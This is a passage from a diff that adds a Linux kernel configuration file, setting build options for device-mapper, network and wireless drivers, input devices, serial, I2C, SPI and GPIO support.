+# CONFIG_DM_DEBUG is not set
+CONFIG_DM_BUFIO=y
+# CONFIG_DM_DEBUG_BLOCK_STACK_TRACING is not set
+CONFIG_DM_BIO_PRISON=y
+CONFIG_DM_PERSISTENT_DATA=y
+CONFIG_DM_CRYPT=y
+CONFIG_DM_SNAPSHOT=y
+CONFIG_DM_THIN_PROVISIONING=y
+# CONFIG_DM_CACHE is not set
+# CONFIG_DM_ERA is not set
+CONFIG_DM_MIRROR=m
+# CONFIG_DM_LOG_USERSPACE is not set
+CONFIG_DM_RAID=m
+# CONFIG_DM_ZERO is not set
+CONFIG_DM_MULTIPATH=m
+# CONFIG_DM_MULTIPATH_QL is not set
+# CONFIG_DM_MULTIPATH_ST is not set
+# CONFIG_DM_DELAY is not set
+CONFIG_DM_UEVENT=y
+# CONFIG_DM_FLAKEY is not set
+# CONFIG_DM_VERITY is not set
+# CONFIG_DM_SWITCH is not set
+# CONFIG_DM_LOG_WRITES is not set
+# CONFIG_TARGET_CORE is not set
+CONFIG_FUSION=y
+CONFIG_FUSION_SPI=m
+CONFIG_FUSION_FC=m
+CONFIG_FUSION_SAS=m
+CONFIG_FUSION_MAX_SGE=128
+CONFIG_FUSION_CTL=m
+# CONFIG_FUSION_LOGGING is not set
+
+#
+# IEEE 1394 (FireWire) support
+#
+CONFIG_FIREWIRE=m
+CONFIG_FIREWIRE_OHCI=m
+CONFIG_FIREWIRE_SBP2=m
+# CONFIG_FIREWIRE_NET is not set
+# CONFIG_FIREWIRE_NOSY is not set
+# CONFIG_MACINTOSH_DRIVERS is not set
+CONFIG_NETDEVICES=y
+CONFIG_MII=m
+CONFIG_NET_CORE=y
+# CONFIG_BONDING is not set
+CONFIG_DUMMY=y
+# CONFIG_EQUALIZER is not set
+# CONFIG_NET_FC is not set
+# CONFIG_NET_TEAM is not set
+CONFIG_MACVLAN=y
+CONFIG_MACVTAP=y
+CONFIG_VXLAN=y
+# CONFIG_GENEVE is not set
+# CONFIG_GTP is not set
+# CONFIG_MACSEC is not set
+# CONFIG_NETCONSOLE is not set
+# CONFIG_NETPOLL is not set
+# CONFIG_NET_POLL_CONTROLLER is not set
+CONFIG_TUN=y
+# CONFIG_TUN_VNET_CROSS_LE is not set
+CONFIG_VETH=y
+CONFIG_VIRTIO_NET=y
+CONFIG_NLMON=m
+# CONFIG_ARCNET is not set
+
+#
+# CAIF transport drivers
+#
+
+#
+# Distributed Switch Architecture drivers
+#
+CONFIG_ETHERNET=y
+CONFIG_MDIO=m
+CONFIG_NET_VENDOR_3COM=y
+# CONFIG_PCMCIA_3C574 is not set
+# CONFIG_PCMCIA_3C589 is not set
+CONFIG_VORTEX=m
+CONFIG_TYPHOON=m
+CONFIG_NET_VENDOR_ADAPTEC=y
+CONFIG_ADAPTEC_STARFIRE=m
+# CONFIG_NET_VENDOR_AGERE is not set
+# CONFIG_NET_VENDOR_ALTEON is not set
+# CONFIG_ALTERA_TSE is not set
+CONFIG_NET_VENDOR_AMAZON=y
+# CONFIG_ENA_ETHERNET is not set
+CONFIG_NET_VENDOR_AMD=y
+CONFIG_AMD8111_ETH=m
+CONFIG_PCNET32=m
+# CONFIG_PCMCIA_NMCLAN is not set
+CONFIG_NET_VENDOR_ARC=y
+CONFIG_NET_VENDOR_ATHEROS=y
+CONFIG_ATL2=m
+CONFIG_ATL1=m
+CONFIG_ATL1E=m
+CONFIG_ATL1C=m
+CONFIG_ALX=m
+# CONFIG_NET_VENDOR_AURORA is not set
+CONFIG_NET_CADENCE=y
+CONFIG_MACB=m
+CONFIG_NET_VENDOR_BROADCOM=y
+CONFIG_B44=m
+CONFIG_B44_PCI_AUTOSELECT=y
+CONFIG_B44_PCICORE_AUTOSELECT=y
+CONFIG_B44_PCI=y
+# CONFIG_BCMGENET is not set
+CONFIG_BNX2=m
+CONFIG_CNIC=m
+CONFIG_TIGON3=m
+CONFIG_BNX2X=m
+CONFIG_BNX2X_SRIOV=y
+# CONFIG_BNXT is not set
+CONFIG_NET_VENDOR_BROCADE=y
+CONFIG_BNA=m
+CONFIG_NET_VENDOR_CAVIUM=y
+# CONFIG_THUNDER_NIC_PF is not set
+# CONFIG_THUNDER_NIC_VF is not set
+# CONFIG_THUNDER_NIC_BGX is not set
+# CONFIG_THUNDER_NIC_RGX is not set
+# CONFIG_LIQUIDIO is not set
+# CONFIG_NET_VENDOR_CHELSIO is not set
+CONFIG_NET_VENDOR_CISCO=y
+CONFIG_ENIC=m
+# CONFIG_CX_ECAT is not set
+# CONFIG_DNET is not set
+CONFIG_NET_VENDOR_DEC=y
+CONFIG_NET_TULIP=y
+CONFIG_DE2104X=m
+CONFIG_DE2104X_DSL=0
+CONFIG_TULIP=m
+# CONFIG_TULIP_MWI is not set
+# CONFIG_TULIP_MMIO is not set
+# CONFIG_TULIP_NAPI is not set
+CONFIG_DE4X5=m
+CONFIG_WINBOND_840=m
+CONFIG_DM9102=m
+CONFIG_ULI526X=m
+# CONFIG_PCMCIA_XIRCOM is not set
+CONFIG_NET_VENDOR_DLINK=y
+CONFIG_DL2K=m
+CONFIG_SUNDANCE=m
+# CONFIG_SUNDANCE_MMIO is not set
+CONFIG_NET_VENDOR_EMULEX=y
+CONFIG_BE2NET=m
+CONFIG_BE2NET_HWMON=y
+CONFIG_NET_VENDOR_EZCHIP=y
+# CONFIG_NET_VENDOR_EXAR is not set
+CONFIG_NET_VENDOR_FUJITSU=y
+# CONFIG_PCMCIA_FMVJ18X is not set
+CONFIG_NET_VENDOR_HP=y
+CONFIG_HP100=m
+CONFIG_NET_VENDOR_INTEL=y
+CONFIG_E100=m
+CONFIG_E1000=m
+CONFIG_E1000E=m
+CONFIG_E1000E_HWTS=y
+CONFIG_IGB=m
+CONFIG_IGB_HWMON=y
+CONFIG_IGB_DCA=y
+CONFIG_IGBVF=m
+CONFIG_IXGB=m
+CONFIG_IXGBE=m
+CONFIG_IXGBE_HWMON=y
+CONFIG_IXGBE_DCA=y
+CONFIG_IXGBEVF=m
+# CONFIG_I40E is not set
+# CONFIG_I40EVF is not set
+# CONFIG_FM10K is not set
+# CONFIG_NET_VENDOR_I825XX is not set
+# CONFIG_JME is not set
+CONFIG_NET_VENDOR_MARVELL=y
+CONFIG_MVMDIO=m
+# CONFIG_MVNETA_BM is not set
+CONFIG_SKGE=m
+# CONFIG_SKGE_DEBUG is not set
+CONFIG_SKGE_GENESIS=y
+CONFIG_SKY2=m
+# CONFIG_SKY2_DEBUG is not set
+# CONFIG_NET_VENDOR_MELLANOX is not set
+# CONFIG_NET_VENDOR_MICREL is not set
+CONFIG_NET_VENDOR_MICROCHIP=y
+# CONFIG_ENC28J60 is not set
+# CONFIG_ENCX24J600 is not set
+# CONFIG_NET_VENDOR_MYRI is not set
+# CONFIG_FEALNX is not set
+CONFIG_NET_VENDOR_NATSEMI=y
+CONFIG_NATSEMI=m
+CONFIG_NS83820=m
+CONFIG_NET_VENDOR_NETRONOME=y
+# CONFIG_NFP_NETVF is not set
+CONFIG_NET_VENDOR_8390=y
+# CONFIG_PCMCIA_AXNET is not set
+CONFIG_NE2K_PCI=m
+# CONFIG_PCMCIA_PCNET is not set
+CONFIG_NET_VENDOR_NVIDIA=y
+CONFIG_FORCEDETH=m
+# CONFIG_NET_VENDOR_OKI is not set
+# CONFIG_ETHOC is not set
+# CONFIG_NET_PACKET_ENGINE is not set
+# CONFIG_NET_VENDOR_QLOGIC is not set
+# CONFIG_NET_VENDOR_QUALCOMM is not set
+CONFIG_NET_VENDOR_REALTEK=y
+CONFIG_8139CP=m
+CONFIG_8139TOO=m
+CONFIG_8139TOO_PIO=y
+# CONFIG_8139TOO_TUNE_TWISTER is not set
+CONFIG_8139TOO_8129=y
+# CONFIG_8139_OLD_RX_RESET is not set
+CONFIG_R8169=m
+CONFIG_NET_VENDOR_RENESAS=y
+# CONFIG_NET_VENDOR_RDC is not set
+# CONFIG_NET_VENDOR_ROCKER is not set
+# CONFIG_NET_VENDOR_SAMSUNG is not set
+# CONFIG_NET_VENDOR_SEEQ is not set
+# CONFIG_NET_VENDOR_SILAN is not set
+# CONFIG_NET_VENDOR_SIS is not set
+# CONFIG_SFC is not set
+# CONFIG_NET_VENDOR_SMSC is not set
+# CONFIG_NET_VENDOR_STMICRO is not set
+# CONFIG_NET_VENDOR_SUN is not set
+CONFIG_NET_VENDOR_SYNOPSYS=y
+# CONFIG_NET_VENDOR_TEHUTI is not set
+# CONFIG_NET_VENDOR_TI is not set
+CONFIG_NET_VENDOR_VIA=y
+CONFIG_VIA_RHINE=m
+CONFIG_VIA_RHINE_MMIO=y
+CONFIG_VIA_VELOCITY=m
+# CONFIG_NET_VENDOR_WIZNET is not set
+CONFIG_NET_VENDOR_XIRCOM=y
+# CONFIG_PCMCIA_XIRC2PS is not set
+# CONFIG_FDDI is not set
+# CONFIG_HIPPI is not set
+# CONFIG_NET_SB1000 is not set
+CONFIG_PHYLIB=y
+
+#
+# MDIO bus device drivers
+#
+# CONFIG_MDIO_BCM_UNIMAC is not set
+# CONFIG_MDIO_BITBANG is not set
+# CONFIG_MDIO_OCTEON is not set
+# CONFIG_MDIO_THUNDER is not set
+
+#
+# MII PHY device drivers
+#
+# CONFIG_AMD_PHY is not set
+# CONFIG_AQUANTIA_PHY is not set
+# CONFIG_AT803X_PHY is not set
+# CONFIG_BCM7XXX_PHY is not set
+# CONFIG_BCM87XX_PHY is not set
+# CONFIG_BROADCOM_PHY is not set
+# CONFIG_CICADA_PHY is not set
+# CONFIG_DAVICOM_PHY is not set
+# CONFIG_DP83848_PHY is not set
+# CONFIG_DP83867_PHY is not set
+# CONFIG_FIXED_PHY is not set
+# CONFIG_ICPLUS_PHY is not set
+# CONFIG_INTEL_XWAY_PHY is not set
+# CONFIG_LSI_ET1011C_PHY is not set
+# CONFIG_LXT_PHY is not set
+# CONFIG_MARVELL_PHY is not set
+# CONFIG_MICREL_PHY is not set
+# CONFIG_MICROCHIP_PHY is not set
+# CONFIG_MICROSEMI_PHY is not set
+# CONFIG_NATIONAL_PHY is not set
+# CONFIG_QSEMI_PHY is not set
+# CONFIG_REALTEK_PHY is not set
+# CONFIG_SMSC_PHY is not set
+# CONFIG_STE10XP is not set
+# CONFIG_TERANETICS_PHY is not set
+# CONFIG_VITESSE_PHY is not set
+# CONFIG_XILINX_GMII2RGMII is not set
+# CONFIG_MICREL_KS8995MA is not set
+# CONFIG_PPP is not set
+# CONFIG_SLIP is not set
+# CONFIG_USB_NET_DRIVERS is not set
+CONFIG_WLAN=y
+CONFIG_WLAN_VENDOR_ADMTEK=y
+# CONFIG_ADM8211 is not set
+CONFIG_ATH_COMMON=m
+CONFIG_WLAN_VENDOR_ATH=y
+# CONFIG_ATH_DEBUG is not set
+CONFIG_ATH5K=m
+# CONFIG_ATH5K_DEBUG is not set
+CONFIG_ATH5K_PCI=y
+CONFIG_ATH9K_HW=m
+CONFIG_ATH9K_COMMON=m
+CONFIG_ATH9K_BTCOEX_SUPPORT=y
+CONFIG_ATH9K=m
+CONFIG_ATH9K_PCI=y
+# CONFIG_ATH9K_AHB is not set
+# CONFIG_ATH9K_DEBUGFS is not set
+# CONFIG_ATH9K_DYNACK is not set
+# CONFIG_ATH9K_WOW is not set
+CONFIG_ATH9K_RFKILL=y
+# CONFIG_ATH9K_CHANNEL_CONTEXT is not set
+CONFIG_ATH9K_PCOEM=y
+CONFIG_ATH9K_HTC=m
+# CONFIG_ATH9K_HTC_DEBUGFS is not set
+# CONFIG_CARL9170 is not set
+CONFIG_ATH6KL=m
+# CONFIG_ATH6KL_SDIO is not set
+# CONFIG_ATH6KL_USB is not set
+# CONFIG_ATH6KL_DEBUG is not set
+# CONFIG_AR5523 is not set
+# CONFIG_WIL6210 is not set
+CONFIG_ATH10K=m
+CONFIG_ATH10K_PCI=m
+# CONFIG_ATH10K_DEBUG is not set
+# CONFIG_ATH10K_DEBUGFS is not set
+# CONFIG_WCN36XX is not set
+CONFIG_WLAN_VENDOR_ATMEL=y
+# CONFIG_ATMEL is not set
+# CONFIG_AT76C50X_USB is not set
+CONFIG_WLAN_VENDOR_BROADCOM=y
+CONFIG_B43=m
+CONFIG_B43_BCMA=y
+CONFIG_B43_SSB=y
+CONFIG_B43_BUSES_BCMA_AND_SSB=y
+# CONFIG_B43_BUSES_BCMA is not set
+# CONFIG_B43_BUSES_SSB is not set
+CONFIG_B43_PCI_AUTOSELECT=y
+CONFIG_B43_PCICORE_AUTOSELECT=y
+# CONFIG_B43_SDIO is not set
+CONFIG_B43_BCMA_PIO=y
+CONFIG_B43_PIO=y
+CONFIG_B43_PHY_G=y
+CONFIG_B43_PHY_N=y
+CONFIG_B43_PHY_LP=y
+CONFIG_B43_PHY_HT=y
+CONFIG_B43_LEDS=y
+# CONFIG_B43_DEBUG is not set
+CONFIG_B43LEGACY=m
+CONFIG_B43LEGACY_PCI_AUTOSELECT=y
+CONFIG_B43LEGACY_PCICORE_AUTOSELECT=y
+CONFIG_B43LEGACY_LEDS=y
+CONFIG_B43LEGACY_DEBUG=y
+CONFIG_B43LEGACY_DMA=y
+CONFIG_B43LEGACY_PIO=y
+CONFIG_B43LEGACY_DMA_AND_PIO_MODE=y
+# CONFIG_B43LEGACY_DMA_MODE is not set
+# CONFIG_B43LEGACY_PIO_MODE is not set
+# CONFIG_BRCMSMAC is not set
+# CONFIG_BRCMFMAC is not set
+CONFIG_WLAN_VENDOR_CISCO=y
+# CONFIG_AIRO is not set
+# CONFIG_AIRO_CS is not set
+CONFIG_WLAN_VENDOR_INTEL=y
+CONFIG_IPW2100=m
+# CONFIG_IPW2100_MONITOR is not set
+# CONFIG_IPW2100_DEBUG is not set
+CONFIG_IPW2200=m
+# CONFIG_IPW2200_MONITOR is not set
+# CONFIG_IPW2200_QOS is not set
+# CONFIG_IPW2200_DEBUG is not set
+CONFIG_LIBIPW=m
+# CONFIG_LIBIPW_DEBUG is not set
+CONFIG_IWLEGACY=m
+CONFIG_IWL4965=m
+CONFIG_IWL3945=m
+
+#
+# iwl3945 / iwl4965 Debugging Options
+#
+# CONFIG_IWLEGACY_DEBUG is not set
+CONFIG_IWLWIFI=m
+CONFIG_IWLWIFI_LEDS=y
+CONFIG_IWLDVM=m
+CONFIG_IWLMVM=m
+CONFIG_IWLWIFI_OPMODE_MODULAR=y
+# CONFIG_IWLWIFI_BCAST_FILTERING is not set
+# CONFIG_IWLWIFI_PCIE_RTPM is not set
+
+#
+# Debugging Options
+#
+# CONFIG_IWLWIFI_DEBUG is not set
+CONFIG_WLAN_VENDOR_INTERSIL=y
+# CONFIG_HOSTAP is not set
+# CONFIG_HERMES is not set
+# CONFIG_P54_COMMON is not set
+# CONFIG_PRISM54 is not set
+CONFIG_WLAN_VENDOR_MARVELL=y
+# CONFIG_LIBERTAS is not set
+# CONFIG_LIBERTAS_THINFIRM is not set
+# CONFIG_MWIFIEX is not set
+# CONFIG_MWL8K is not set
+CONFIG_WLAN_VENDOR_MEDIATEK=y
+# CONFIG_MT7601U is not set
+CONFIG_WLAN_VENDOR_RALINK=y
+CONFIG_RT2X00=m
+CONFIG_RT2400PCI=m
+CONFIG_RT2500PCI=m
+CONFIG_RT61PCI=m
+CONFIG_RT2800PCI=m
+CONFIG_RT2800PCI_RT33XX=y
+CONFIG_RT2800PCI_RT35XX=y
+CONFIG_RT2800PCI_RT53XX=y
+CONFIG_RT2800PCI_RT3290=y
+# CONFIG_RT2500USB is not set
+# CONFIG_RT73USB is not set
+# CONFIG_RT2800USB is not set
+CONFIG_RT2800_LIB=m
+CONFIG_RT2800_LIB_MMIO=m
+CONFIG_RT2X00_LIB_MMIO=m
+CONFIG_RT2X00_LIB_PCI=m
+CONFIG_RT2X00_LIB=m
+CONFIG_RT2X00_LIB_FIRMWARE=y
+CONFIG_RT2X00_LIB_CRYPTO=y
+CONFIG_RT2X00_LIB_LEDS=y
+# CONFIG_RT2X00_DEBUG is not set
+CONFIG_WLAN_VENDOR_REALTEK=y
+# CONFIG_RTL8180 is not set
+# CONFIG_RTL8187 is not set
+CONFIG_RTL_CARDS=m
+CONFIG_RTL8192CE=m
+CONFIG_RTL8192SE=m
+CONFIG_RTL8192DE=m
+CONFIG_RTL8723AE=m
+# CONFIG_RTL8723BE is not set
+CONFIG_RTL8188EE=m
+# CONFIG_RTL8192EE is not set
+# CONFIG_RTL8821AE is not set
+# CONFIG_RTL8192CU is not set
+CONFIG_RTLWIFI=m
+CONFIG_RTLWIFI_PCI=m
+CONFIG_RTLWIFI_DEBUG=y
+CONFIG_RTL8192C_COMMON=m
+CONFIG_RTL8723_COMMON=m
+CONFIG_RTLBTCOEXIST=m
+# CONFIG_RTL8XXXU is not set
+CONFIG_WLAN_VENDOR_RSI=y
+# CONFIG_RSI_91X is not set
+CONFIG_WLAN_VENDOR_ST=y
+# CONFIG_CW1200 is not set
+CONFIG_WLAN_VENDOR_TI=y
+# CONFIG_WL1251 is not set
+# CONFIG_WL12XX is not set
+# CONFIG_WL18XX is not set
+# CONFIG_WLCORE is not set
+CONFIG_WLAN_VENDOR_ZYDAS=y
+# CONFIG_USB_ZD1201 is not set
+# CONFIG_ZD1211RW is not set
+# CONFIG_PCMCIA_RAYCS is not set
+# CONFIG_PCMCIA_WL3501 is not set
+# CONFIG_MAC80211_HWSIM is not set
+# CONFIG_USB_NET_RNDIS_WLAN is not set
+
+#
+# Enable WiMAX (Networking options) to see the WiMAX drivers
+#
+# CONFIG_WAN is not set
+# CONFIG_VMXNET3 is not set
+# CONFIG_FUJITSU_ES is not set
+# CONFIG_ISDN is not set
+# CONFIG_NVM is not set
+
+#
+# Input device support
+#
+CONFIG_INPUT=y
+CONFIG_INPUT_LEDS=m
+# CONFIG_INPUT_FF_MEMLESS is not set
+CONFIG_INPUT_POLLDEV=m
+CONFIG_INPUT_SPARSEKMAP=m
+# CONFIG_INPUT_MATRIXKMAP is not set
+
+#
+# Userland interfaces
+#
+CONFIG_INPUT_MOUSEDEV=m
+CONFIG_INPUT_MOUSEDEV_PSAUX=y
+CONFIG_INPUT_MOUSEDEV_SCREEN_X=1024
+CONFIG_INPUT_MOUSEDEV_SCREEN_Y=768
+# CONFIG_INPUT_JOYDEV is not set
+CONFIG_INPUT_EVDEV=m
+# CONFIG_INPUT_EVBUG is not set
+
+#
+# Input Device Drivers
+#
+CONFIG_INPUT_KEYBOARD=y
+# CONFIG_KEYBOARD_ADP5588 is not set
+# CONFIG_KEYBOARD_ADP5589 is not set
+CONFIG_KEYBOARD_ATKBD=y
+# CONFIG_KEYBOARD_QT1070 is not set
+# CONFIG_KEYBOARD_QT2160 is not set
+# CONFIG_KEYBOARD_LKKBD is not set
+# CONFIG_KEYBOARD_GPIO is not set
+# CONFIG_KEYBOARD_GPIO_POLLED is not set
+# CONFIG_KEYBOARD_TCA6416 is not set
+# CONFIG_KEYBOARD_TCA8418 is not set
+# CONFIG_KEYBOARD_MATRIX is not set
+# CONFIG_KEYBOARD_LM8323 is not set
+# CONFIG_KEYBOARD_LM8333 is not set
+# CONFIG_KEYBOARD_MAX7359 is not set
+# CONFIG_KEYBOARD_MCS is not set
+# CONFIG_KEYBOARD_MPR121 is not set
+# CONFIG_KEYBOARD_NEWTON is not set
+# CONFIG_KEYBOARD_OPENCORES is not set
+# CONFIG_KEYBOARD_SAMSUNG is not set
+# CONFIG_KEYBOARD_STOWAWAY is not set
+# CONFIG_KEYBOARD_SUNKBD is not set
+# CONFIG_KEYBOARD_XTKBD is not set
+CONFIG_INPUT_MOUSE=y
+CONFIG_MOUSE_PS2=y
+CONFIG_MOUSE_PS2_ALPS=y
+CONFIG_MOUSE_PS2_BYD=y
+CONFIG_MOUSE_PS2_LOGIPS2PP=y
+CONFIG_MOUSE_PS2_SYNAPTICS=y
+CONFIG_MOUSE_PS2_CYPRESS=y
+CONFIG_MOUSE_PS2_LIFEBOOK=y
+CONFIG_MOUSE_PS2_TRACKPOINT=y
+CONFIG_MOUSE_PS2_ELANTECH=y
+# CONFIG_MOUSE_PS2_SENTELIC is not set
+# CONFIG_MOUSE_PS2_TOUCHKIT is not set
+CONFIG_MOUSE_PS2_FOCALTECH=y
+# CONFIG_MOUSE_PS2_VMMOUSE is not set
+# CONFIG_MOUSE_SERIAL is not set
+# CONFIG_MOUSE_APPLETOUCH is not set
+# CONFIG_MOUSE_BCM5974 is not set
+# CONFIG_MOUSE_CYAPA is not set
+# CONFIG_MOUSE_ELAN_I2C is not set
+# CONFIG_MOUSE_VSXXXAA is not set
+# CONFIG_MOUSE_GPIO is not set
+CONFIG_MOUSE_SYNAPTICS_I2C=m
+CONFIG_MOUSE_SYNAPTICS_USB=m
+# CONFIG_INPUT_JOYSTICK is not set
+# CONFIG_INPUT_TABLET is not set
+# CONFIG_INPUT_TOUCHSCREEN is not set
+# CONFIG_INPUT_MISC is not set
+# CONFIG_RMI4_CORE is not set
+
+#
+# Hardware I/O ports
+#
+CONFIG_SERIO=y
+CONFIG_ARCH_MIGHT_HAVE_PC_SERIO=y
+CONFIG_SERIO_I8042=y
+CONFIG_SERIO_SERPORT=y
+# CONFIG_SERIO_CT82C710 is not set
+CONFIG_SERIO_PCIPS2=m
+CONFIG_SERIO_LIBPS2=y
+CONFIG_SERIO_RAW=m
+# CONFIG_SERIO_ALTERA_PS2 is not set
+# CONFIG_SERIO_PS2MULT is not set
+# CONFIG_SERIO_ARC_PS2 is not set
+# CONFIG_USERIO is not set
+# CONFIG_GAMEPORT is not set
+
+#
+# Character devices
+#
+CONFIG_TTY=y
+CONFIG_VT=y
+CONFIG_CONSOLE_TRANSLATIONS=y
+CONFIG_VT_CONSOLE=y
+CONFIG_HW_CONSOLE=y
+CONFIG_VT_HW_CONSOLE_BINDING=y
+CONFIG_UNIX98_PTYS=y
+# CONFIG_LEGACY_PTYS is not set
+# CONFIG_SERIAL_NONSTANDARD is not set
+# CONFIG_NOZOMI is not set
+# CONFIG_N_GSM is not set
+# CONFIG_TRACE_SINK is not set
+# CONFIG_DEVMEM is not set
+# CONFIG_DEVKMEM is not set
+
+#
+# Serial drivers
+#
+# CONFIG_SERIAL_8250 is not set
+
+#
+# Non-8250 serial port support
+#
+# CONFIG_SERIAL_MAX3100 is not set
+# CONFIG_SERIAL_MAX310X is not set
+# CONFIG_SERIAL_UARTLITE is not set
+# CONFIG_SERIAL_JSM is not set
+# CONFIG_SERIAL_SCCNXP is not set
+# CONFIG_SERIAL_SC16IS7XX is not set
+# CONFIG_SERIAL_ALTERA_JTAGUART is not set
+# CONFIG_SERIAL_ALTERA_UART is not set
+# CONFIG_SERIAL_IFX6X60 is not set
+# CONFIG_SERIAL_ARC is not set
+# CONFIG_SERIAL_RP2 is not set
+# CONFIG_SERIAL_FSL_LPUART is not set
+# CONFIG_TTY_PRINTK is not set
+# CONFIG_VIRTIO_CONSOLE is not set
+# CONFIG_IPMI_HANDLER is not set
+# CONFIG_HW_RANDOM is not set
+CONFIG_NVRAM=m
+# CONFIG_R3964 is not set
+# CONFIG_APPLICOM is not set
+
+#
+# PCMCIA character devices
+#
+# CONFIG_SYNCLINK_CS is not set
+# CONFIG_CARDMAN_4000 is not set
+# CONFIG_CARDMAN_4040 is not set
+# CONFIG_IPWIRELESS is not set
+# CONFIG_MWAVE is not set
+# CONFIG_RAW_DRIVER is not set
+CONFIG_HPET=y
+# CONFIG_HPET_MMAP is not set
+# CONFIG_HANGCHECK_TIMER is not set
+# CONFIG_TCG_TPM is not set
+# CONFIG_TELCLOCK is not set
+CONFIG_DEVPORT=y
+# CONFIG_XILLYBUS is not set
+
+#
+# I2C support
+#
+CONFIG_I2C=y
+CONFIG_ACPI_I2C_OPREGION=y
+CONFIG_I2C_BOARDINFO=y
+CONFIG_I2C_COMPAT=y
+CONFIG_I2C_CHARDEV=m
+CONFIG_I2C_MUX=m
+
+#
+# Multiplexer I2C Chip support
+#
+# CONFIG_I2C_MUX_GPIO is not set
+CONFIG_I2C_MUX_PCA9541=m
+# CONFIG_I2C_MUX_PCA954x is not set
+CONFIG_I2C_MUX_REG=m
+CONFIG_I2C_HELPER_AUTO=y
+CONFIG_I2C_SMBUS=m
+CONFIG_I2C_ALGOBIT=y
+
+#
+# I2C Hardware Bus support
+#
+
+#
+# PC SMBus host controller drivers
+#
+# CONFIG_I2C_ALI1535 is not set
+# CONFIG_I2C_ALI1563 is not set
+# CONFIG_I2C_ALI15X3 is not set
+CONFIG_I2C_AMD756=m
+CONFIG_I2C_AMD756_S4882=m
+CONFIG_I2C_AMD8111=m
+CONFIG_I2C_I801=m
+CONFIG_I2C_ISCH=m
+CONFIG_I2C_ISMT=m
+CONFIG_I2C_PIIX4=m
+CONFIG_I2C_NFORCE2=m
+CONFIG_I2C_NFORCE2_S4985=m
+# CONFIG_I2C_SIS5595 is not set
+# CONFIG_I2C_SIS630 is not set
+# CONFIG_I2C_SIS96X is not set
+# CONFIG_I2C_VIA is not set
+# CONFIG_I2C_VIAPRO is not set
+
+#
+# ACPI drivers
+#
+CONFIG_I2C_SCMI=m
+
+#
+# I2C system bus drivers (mostly embedded / system-on-chip)
+#
+# CONFIG_I2C_CBUS_GPIO is not set
+CONFIG_I2C_DESIGNWARE_CORE=m
+# CONFIG_I2C_DESIGNWARE_PLATFORM is not set
+CONFIG_I2C_DESIGNWARE_PCI=m
+# CONFIG_I2C_EMEV2 is not set
+# CONFIG_I2C_GPIO is not set
+# CONFIG_I2C_OCORES is not set
+# CONFIG_I2C_PCA_PLATFORM is not set
+# CONFIG_I2C_PXA_PCI is not set
+# CONFIG_I2C_SIMTEC is not set
+# CONFIG_I2C_XILINX is not set
+
+#
+# External I2C/SMBus adapter drivers
+#
+# CONFIG_I2C_DIOLAN_U2C is not set
+# CONFIG_I2C_PARPORT_LIGHT is not set
+# CONFIG_I2C_ROBOTFUZZ_OSIF is not set
+# CONFIG_I2C_TAOS_EVM is not set
+# CONFIG_I2C_TINY_USB is not set
+
+#
+# Other I2C/SMBus bus drivers
+#
+# CONFIG_I2C_STUB is not set
+CONFIG_I2C_SLAVE=y
+CONFIG_I2C_SLAVE_EEPROM=m
+# CONFIG_I2C_DEBUG_CORE is not set
+# CONFIG_I2C_DEBUG_ALGO is not set
+# CONFIG_I2C_DEBUG_BUS is not set
+CONFIG_SPI=y
+# CONFIG_SPI_DEBUG is not set
+CONFIG_SPI_MASTER=y
+
+#
+# SPI Master Controller Drivers
+#
+# CONFIG_SPI_ALTERA is not set
+# CONFIG_SPI_AXI_SPI_ENGINE is not set
+CONFIG_SPI_BITBANG=m
+# CONFIG_SPI_CADENCE is not set
+CONFIG_SPI_DESIGNWARE=m
+CONFIG_SPI_DW_PCI=m
+# CONFIG_SPI_DW_MID_DMA is not set
+CONFIG_SPI_DW_MMIO=m
+# CONFIG_SPI_GPIO is not set
+# CONFIG_SPI_OC_TINY is not set
+# CONFIG_SPI_PXA2XX is not set
+# CONFIG_SPI_PXA2XX_PCI is not set
+# CONFIG_SPI_ROCKCHIP is not set
+# CONFIG_SPI_SC18IS602 is not set
+# CONFIG_SPI_XCOMM is not set
+# CONFIG_SPI_XILINX is not set
+# CONFIG_SPI_ZYNQMP_GQSPI is not set
+
+#
+# SPI Protocol Masters
+#
+# CONFIG_SPI_SPIDEV is not set
+# CONFIG_SPI_LOOPBACK_TEST is not set
+# CONFIG_SPI_TLE62X0 is not set
+# CONFIG_SPMI is not set
+# CONFIG_HSI is not set
+
+#
+# PPS support
+#
+CONFIG_PPS=m
+# CONFIG_PPS_DEBUG is not set
+
+#
+# PPS clients support
+#
+# CONFIG_PPS_CLIENT_KTIMER is not set
+# CONFIG_PPS_CLIENT_LDISC is not set
+# CONFIG_PPS_CLIENT_GPIO is not set
+
+#
+# PPS generators support
+#
+
+#
+# PTP clock support
+#
+CONFIG_PTP_1588_CLOCK=m
+# CONFIG_DP83640_PHY is not set
+CONFIG_GPIOLIB=y
+CONFIG_GPIO_ACPI=y
+CONFIG_GPIOLIB_IRQCHIP=y
+# CONFIG_DEBUG_GPIO is not set
+CONFIG_GPIO_SYSFS=y
+CONFIG_GPIO_GENERIC=m
+CONFIG_GPIO_MAX730X=m
+
+#
+# Memory mapped GPIO drivers
+#
+CONFIG_GPIO_AMDPT=m
+CONFIG_GPIO_DWAPB=m
+CONFIG_GPIO_GENERIC_PLATFORM=m
+CONFIG_GPIO_ICH=m
+CONFIG_GPIO_LYNXPOINT=m
+# CONFIG_GPIO_MOCKUP is not set
+# CONFIG_GPIO_VX855 is not set
+# CONFIG_GPIO_ZX is not set
+
+#
+# Port-mapped I/O GPIO drivers
+#
+CONFIG_GPIO_F7188X=m
+CONFIG_GPIO_IT87=m
+CONFIG_GPIO_SCH=m
+CONFIG_GPIO_SCH311X=m
+
+#
+# I2C GPIO expanders
+#
+CONFIG_GPIO_ADP5588=m
+CONFIG_GPIO_MAX7300=m
+CONFIG_GPIO_MAX732X=m
+CONFIG_GPIO_PCA953X=m
+CONFIG_GPIO_PCF857X=m
+CONFIG_GPIO_SX150X=y
+CONFIG_GPIO_TPIC2810=m
+CONFIG_GPIO_TS4900=m
+
+#
+# MFD GPIO expanders
+#
+
+#
+# PCI GPIO expanders
+#
+CONFIG_GPIO_AMD8111=m
+CONFIG_GPIO_BT8XX=m
+CONFIG_GPIO_ML_IOH=m
+CONFIG_GPIO_RDC321X=m
+
+#
+# SPI GPIO expanders
+#
+CONFIG_GPIO_MAX7301=m
+CONFIG_GPIO_MC33880=m
+CONFIG_GPIO_PISOSR=m
+
+#
+# SPI or I2C GPIO expanders
+#
+
+#
+# USB GPIO expanders
+#
+CONFIG_W1=m
+CONFIG_W1_CON=y
+
+#
+# 1-wire Bus Masters
+#
+CONFIG_W1_MASTER_MATROX=m
+CONFIG_W1_MASTER_DS2490=m
+CONFIG_W1_MASTER_DS2482=m
